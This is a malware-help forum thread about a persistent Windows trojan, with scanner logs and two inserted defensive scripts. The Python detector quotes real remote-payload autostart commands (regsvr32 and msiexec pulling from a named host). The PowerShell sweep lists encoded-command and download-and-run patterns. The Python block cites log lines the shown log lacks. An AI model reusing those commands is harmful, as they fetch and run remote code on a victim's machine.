2017-09-02 17:38 - 2015-06-18 22:11 - 000000866 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1331985295-2685822398-3683760129-1000Core.job
2017-09-01 18:41 - 2015-09-14 16:37 - 000229872 _____ C:\Windows\ntbtlog.txt
2017-09-01 18:10 - 2017-05-23 21:46 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-09-01 17:54 - 2013-08-27 12:15 - 000000000 ____D C:\Users\UpdatusUser
2017-09-01 17:53 - 2014-10-05 18:30 - 000000000 ____D C:\Users\XYZ\AppData\LocalLow\Temp
2017-08-31 20:42 - 2013-08-23 19:41 - 000072328 _____ C:\Users\XYZ\AppData\Local\GDIPFONTCACHEV1.DAT
2017-08-31 20:42 - 2009-07-14 00:45 - 000315544 _____ C:\Windows\system32\FNTCACHE.DAT
2017-08-28 22:52 - 2013-08-23 20:02 - 000002208 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-23 17:07 - 2013-11-10 21:46 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\Dropbox
2017-08-22 22:52 - 2016-09-23 19:20 - 000000000 ____D C:\Users\XYZ\Documents\Nexus Mod Manager
2017-08-22 21:25 - 2017-03-08 18:34 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-08-22 21:25 - 2017-03-08 18:34 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-08-21 23:05 - 2017-03-08 18:35 - 000000000 ____D C:\Users\XYZ\AppData\LocalLow\Mozilla
2017-08-21 19:44 - 2013-08-23 19:39 - 000000000 ____D C:\Users\XYZ
2017-08-21 16:03 - 2014-05-19 23:54 - 000000000 ____D C:\ProgramData\Package Cache
2017-08-21 15:50 - 2015-11-10 01:16 - 000000000 ____D C:\Users\XYZ\AppData\Local\Fallout4
2017-08-16 22:11 - 2013-12-30 15:22 - 000000000 ____D C:\Users\XYZ\AppData\Local\Black_Tree_Gaming
2017-08-13 22:08 - 2015-01-02 16:19 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-08-03 15:01 - 2013-08-26 18:59 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\uTorrent
 
==================== Files in the root of some directories =======
 
2013-08-26 16:52 - 2013-08-26 16:55 - 000000253 _____ () C:\Users\XYZ\AppData\Roaming\ANICONFIG_{D4B2AF1C-DAFF-4A89-862D-6477BB84FB60}.ini
2013-08-27 12:34 - 2015-11-05 16:52 - 002128896 _____ () C:\Users\XYZ\AppData\Local\file__0.localstorage
2016-07-13 17:46 - 2016-10-16 00:06 - 000007615 _____ () C:\Users\XYZ\AppData\Local\Resmon.ResmonCfg
2013-09-03 18:45 - 2013-09-03 18:45 - 000000057 _____ () C:\ProgramData\Ament.ini
2002-01-13 02:59 - 2002-01-13 02:59 - 000000000 ____H () C:\ProgramData\sdpsenv.dat
 
Files to move or delete:
====================
C:\ProgramData\sdpsenv.dat
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2016-12-04 18:37
 
==================== End of FRST.txt ============================
 
Thank you for your time! Any help is appreciated  :)
 
Doxxy

Edited by Doxxy, 03 September 2017 - 07:40 PM.
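The two `HKLM\...\Run` entries that FRST marked with `<==== ATTENTION` are the part of the log that matters: both start a Microsoft-signed binary (`regsvr32` with `scrobj.dll`, and `msiexec`) with a remote URL as its argument, which is why the infection survives every reboot even after the antivirus removes the payload. The following script is an added example (not Farbar's code and not posted by anyone in this thread) that parses FRST-style Run-key lines, flags commands that pull content from the network, and collects the referenced hosts so a defender can check DNS or proxy logs and block them. The sample lines are copied from the log above; the rule names, the `RUN_LINE` pattern and the `scan`/`classify` functions are this example's own assumptions about the FRST line format.

```python
import re

# Constructed sample input: FRST-style Run-key lines copied from the
# "Registry (Whitelisted)" section of the log above (two flagged, three benign).
SAMPLE_LINES = [
    r"HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)",
    r"HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION",
    r"HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION",
    r"HKLM-x32\...\Run: [iTunesHelper] => E:\Program Files\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)",
    r"HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [Steam] => E:\Program Files\Steam\steam.exe [3071776 2017-08-28] (Valve Corporation)",
]

# Assumed FRST line shape: "<hive>\...\Run: [<value name>] => <command>[ <==== ATTENTION]"
RUN_LINE = re.compile(
    r"^(?P<hive>[^\s\[]+?)\\\.\.\.\\Run: \[(?P<name>[^\]]*)\] => "
    r"(?P<cmd>.*?)(?P<attn> <==== ATTENTION)?\s*$"
)

# FRST defangs URLs as hxxp:// ; accept both spellings and capture the host.
URL = r"(?:hxxp|http)s?://(?P<host>[A-Za-z0-9.\-]+)"

# Detection rules: (label, pattern). A command may trip more than one rule.
RULES = [
    # regsvr32 /i:<url> scrobj.dll loads a scriptlet fetched from the network
    ("regsvr32 remote scriptlet", re.compile(r"\bregsvr32\b.*?/i:" + URL, re.I)),
    # msiexec /i <url> installs a package straight from the network
    ("msiexec remote package", re.compile(r"\bmsiexec(?:\.exe)?\b.*?/i\s+" + URL, re.I)),
    # catch-all: any URL in an autostart command deserves a look
    ("URL in autostart command", re.compile(URL, re.I)),
]


def parse_run_entries(lines):
    """Yield (hive, value name, command, flagged_by_frst) for each Run-key line."""
    for line in lines:
        m = RUN_LINE.match(line.strip())
        if m:
            yield m.group("hive"), m.group("name"), m.group("cmd"), m.group("attn") is not None


def classify(cmd):
    """Return (matched rule labels, remote hosts) for one autostart command."""
    reasons, hosts = [], set()
    for label, pattern in RULES:
        m = pattern.search(cmd)
        if m:
            reasons.append(label)
            hosts.add(m.group("host").lower())
    return reasons, hosts


def scan(lines):
    """Return the suspicious Run entries and the set of hosts they reach out to."""
    findings, hosts = [], set()
    for hive, name, cmd, flagged in parse_run_entries(lines):
        reasons, cmd_hosts = classify(cmd)
        if reasons:
            findings.append({"hive": hive, "name": name, "cmd": cmd,
                             "reasons": reasons, "frst_flagged": flagged})
            hosts |= cmd_hosts
    return findings, hosts


if __name__ == "__main__":
    found, remote_hosts = scan(SAMPLE_LINES)
    for f in found:
        print(f"[{f['name']}] {f['cmd']}\n    -> {', '.join(f['reasons'])}")
    print("hosts to look for in DNS/proxy logs:", sorted(remote_hosts))
```

Running it against the sample lines reports only `start` and `start1`, both tripping a specific rule plus the catch-all, and yields `js.mykings.top` as the single host to hunt for; the benign vendor entries, which point at signed local binaries with size and date metadata, produce nothing. The same `scan` can be fed a whole FRST.txt, since non-matching lines are simply skipped.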



 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,664 posts
  • OFFLINE
  • Gender:Male
  • Local time:08:05 PM

Posted 02 September 2017 - 11:40 PM

Hi Doxxy :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on Malwarebytes Forums, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against Malwarebytes Forums's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

RogueKiller
  • Download the right version of RogueKiller for your Windows version (32 or 64-bit)
  • Once done, move the executable file to your Desktop, right-click on it and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Start Scan button in the right panel, which will bring you to another tab, and click on it again (this time it'll be in the bottom right corner)
  • Wait for the scan to complete
  • On completion, the results will be displayed
  • Check every single entry (threat found), and click on the Remove Selected button
  • On completion, the results will be displayed. Click on the Open Report button in the bottom left corner, followed by the Open TXT button (also in the bottom left corner)
  • This will open the report in Notepad. Copy/paste its content in your next reply

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Doxxy (Topic Starter)

Posted 03 September 2017 - 09:54 AM

Hey Aura!
 
Thanks for getting back to me so quickly.  I ran RogueKiller; here is the log:
 
RogueKiller V12.11.12.0 (x64) [Aug 28 2017] (Free) by Adlice Software
 
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : XYZ [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 09/03/2017 10:07:29 (Duration : 00:16:40)
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 8 ¤¤¤
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-1331985295-2685822398-3683760129-1001\Software\iVIDI Plugin -> Deleted
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-1331985295-2685822398-3683760129-1001\Software\Myfree Codec -> Deleted
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-1331985295-2685822398-3683760129-1001\Software\iVIDI Plugin -> Deleted
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-1331985295-2685822398-3683760129-1001\Software\Myfree Codec -> Deleted
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 216.104.96.22 216.104.98.222 ([Canada][Canada])  -> Replaced ()
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 216.104.96.22 216.104.98.222 ([Canada][Canada])  -> Replaced ()
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{FE7A27F3-EA0A-4F7A-84BE-9DB5984BB7B3} | DhcpNameServer : 216.104.96.22 216.104.98.222 ([Canada][Canada])  -> Replaced ()
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{FE7A27F3-EA0A-4F7A-84BE-9DB5984BB7B3} | DhcpNameServer : 216.104.96.22 216.104.98.222 ([Canada][Canada])  -> Replaced ()
 
¤¤¤ Tasks : 1 ¤¤¤
[Hj.Shortcut] \{AE0ED555-92DF-4894-9EF1-CFA5244D29A9} -- "c:\program files (x86)\google\chrome\application\chrome.exe" (http://ui.skype.com/ui/0/7.26.80.101/en/abandoninstall?page=tsProgressBar) -> Deleted
 
¤¤¤ Files : 9 ¤¤¤
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.5_41073\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.5_41202\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.5_41372\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.5_41865\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.6_42094\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.7_42330\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.9_42973\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.4.9_43388\utorrentie.exe -> Deleted
[Tr.Gen0][File] C:\Users\XYZ\AppData\Roaming\uTorrent\updates\3.5.0_43580\utorrentie.exe -> Deleted
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 2 ¤¤¤
[PUP.Gen0][Chrome:Addon] Default : Lone Tree [hfmkllfplegemejikoabfpjdaoncphip] -> Deleted
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : session.startup_urls [http://google.ca/] -> Deleted
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST120HM000-1G5142 ATA Device +++++
--- User ---
[MBR] 0d2dd675f7363619fcd00a1bd07e273c
[BSP] da401ed7fe71cfc286e96cb188fa65fb : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: WDC WD1002FAEX-00Z3A0 ATA Device +++++
--- User ---
[MBR] a761f8352431f684a79aa254a5f3a7d8
[BSP] 4f6f8e3c37a070cf73a7d6c8a9b20a37 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
 
Strangely enough, when I booted this morning, WSE did not detect the Powemet.B!attk.  However, after rebooting post-RogueKiller it is back.  Should I attempt RogueKiller again or do you have something else in mind?
 
Thanks,
 
Doxxy

Edited by Doxxy, 03 September 2017 - 07:39 PM.


#4 Aura (Bleepin' Special Ops, Malware Response Team)

Posted 03 September 2017 - 10:28 AM

I have something else in mind :) Now, let's run a scan with Malwarebytes.

Malwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point
  • Once Malwarebytes is installed, launch it and let it update its database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan
  • Let the scan run; the time required to complete the scan depends on your system and computer specs
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button
    • If it asks you to restart your computer to complete the removal, do so
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply



#5 Doxxy (Topic Starter)

Posted 03 September 2017 - 12:53 PM

Hey Aura!

Here is the Malwarebytes report:

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 9/3/17
Scan Time: 1:45 PM
Log File: b2a32d1a-90cf-11e7-af2b-60a44c624579.json
Administrator: Yes
 
-Software Information-
Version: 3.2.2.2018
Components Version: 1.0.186
Update Package Version: 1.0.2719
License: Trial
 
-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: XYZ-PC\XYZ
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 380382
Threats Detected: 3
Threats Quarantined: 3
Time Elapsed: 1 min, 41 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 2
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START, Quarantined, [458], [400553],1.0.2719
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START1, Quarantined, [458], [396503],1.0.2719
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 1
Rogue.Multiple, C:\PROGRAMDATA\374311380, Quarantined, [8766], [170100],1.0.2719
 
File: 0
(No malicious items detected)
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
 
Upon reboot, MSE has not seemed to detect B!attk (the history mentions my boot this morning and the boot from this afternoon, but not the reboot post-Malwarebytes).
 
I am painting my house, so I may be a few hours getting back to you next time :)
 
Thanks!
 
Doxxy

Edited by Doxxy, 03 September 2017 - 07:41 PM.


#6 Aura (Bleepin' Special Ops, Malware Response Team)

Posted 03 September 2017 - 12:59 PM

Malwarebytes took care of the threat.

Registry Value: 2
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START, Quarantined, [458], [400553],1.0.2719
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START1, Quarantined, [458], [396503],1.0.2719

If you want, you can let your computer run, and launch a new scan with MSE later on after your painting to see if it detects it or not, but I doubt it :)


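The two values Malwarebytes quarantined above, START and START1, sat under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and values under that key are executed at every logon, which is consistent with the detection coming back after each reboot. Here is an added example, not part of the thread and not a tool the helper used, of how to look at those autostart keys yourself before or after a cleaner runs: a read-only PowerShell sweep that lists Run/RunOnce values and flags the ones that launch a script host with hidden-window or encoded-command switches. The key list, the keyword patterns and the length threshold are choices made for this example, not a signature for the Powemet family, and the script changes nothing on the system.

```powershell
# Added example, not part of the original thread: a read-only sweep of the
# Run/RunOnce autostart keys, flagging values that launch a script host with
# hidden-window or encoded-command switches. The key list and the keyword
# patterns are choices made for this example, not a signature for Powemet.

$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Script hosts that a malicious autostart entry typically invokes.
$HostPattern = 'powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|regsvr32'
# Switches and idioms that hide a window or carry an encoded or downloaded payload.
$FlagPattern = '-enc|encodedcommand|-e\s|windowstyle\s+hidden|-w\s+hidden|-nop|bypass|frombase64string|invoke-expression|\biex\b|downloadstring'

function Get-SuspiciousRunValue {
    foreach ($Key in $RunKeys) {
        if (-not (Test-Path -LiteralPath $Key)) { continue }
        $Item = Get-Item -LiteralPath $Key
        foreach ($Name in $Item.GetValueNames()) {
            # Read the raw data without expanding %VARIABLES%, so obfuscation survives intact.
            $Data = [string]$Item.GetValue($Name, '', 'DoNotExpandEnvironmentNames')
            $Reasons = @()
            if ($Data -match $HostPattern) { $Reasons += 'script host' }
            if ($Data -match $FlagPattern) { $Reasons += 'hidden/encoded' }
            if ($Data.Length -gt 400)      { $Reasons += 'unusually long value' }
            if ($Reasons.Count -eq 0) { continue }
            $Preview = $Data
            if ($Preview.Length -gt 120) { $Preview = $Preview.Substring(0, 120) + '...' }
            [pscustomobject]@{
                Key     = $Key
                Name    = $Name
                Reasons = ($Reasons -join ', ')
                Data    = $Preview
            }
        }
    }
}

# Emit the findings; pipe to Export-Csv instead to keep a record before cleaning anything.
Get-SuspiciousRunValue | Format-List
```

Run it from an elevated PowerShell prompt so the HKLM keys are readable and the HKCU keys belong to the account you actually log on with. The -match operator is case-insensitive by default, so the patterns catch mixed-case launchers. A value that trips only the "script host" rule can be legitimate (updaters and vendor tools use cmd.exe and rundll32 too); the ones worth acting on are those that also hit "hidden/encoded" or are unusually long, and copying the full Data field into the thread before removing anything lets the helper confirm what it was.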

#7 Doxxy (Topic Starter)

Posted 03 September 2017 - 07:42 PM

Hey Aura!

While I was painting I ran a full system scan.  MSE did not find anything malicious! Looks to be all good :)

Thanks so much for all your help, have a great long weekend!

Doxxy


Edited by Doxxy, 03 September 2017 - 07:42 PM.


#8 Aura (Bleepin' Special Ops, Malware Response Team)

Posted 03 September 2017 - 08:27 PM

No problem Doxxy, you're welcome!

Stay safe :)



#9 Aura (Bleepin' Special Ops, Malware Response Team)

Posted 03 September 2017 - 08:27 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
